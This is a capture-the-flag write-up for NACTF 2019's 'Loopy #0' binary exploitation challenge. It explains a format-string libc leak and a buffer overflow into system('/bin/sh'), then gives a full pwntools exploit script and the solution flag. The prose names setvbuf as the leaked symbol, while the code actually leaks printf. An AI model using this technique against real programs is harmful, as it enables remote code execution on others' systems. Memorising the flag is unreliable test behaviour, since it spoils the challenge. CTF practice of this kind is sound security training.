Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

Loopy #0

Binary Exploitation - Points: 350

This program is quite short, but has got printf and gets in it! This shouldn't be too hard, right?

Connect at nc shell.2019.nactf.com 31283

loopy-0.c

loopy-0

libc.so.6

The exploit uses a format string to print out the address of setvbuf from libc to be able to calculate the libc base address. It also overflows the buffer to call the function recursively again to be able to send another input.

With the libc base address we can now calculate the addresses of system and /bin/sh and overflow the buffer again to jump to it and spawn a shell.

Exploit script:

from pwn import *

libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search('/bin/sh'))
libc_setvbuf = libc.symbols['printf']

e = ELF('loopy-0')
printf = e.got['printf']

# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')

payload = p32(printf) + '%4$s' + 'A' * 68 + p32(e.symbols['vuln'])

p.sendline(payload)
p.recvuntil('You typed: ')
p.recv(4)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))

libc_base = leak - libc_setvbuf

system = libc_base + system
shell = libc_base + shell

log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))

p.sendline('A'*76+p32(system)+p32(0x0)+p32(shell))
p.interactive()

flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}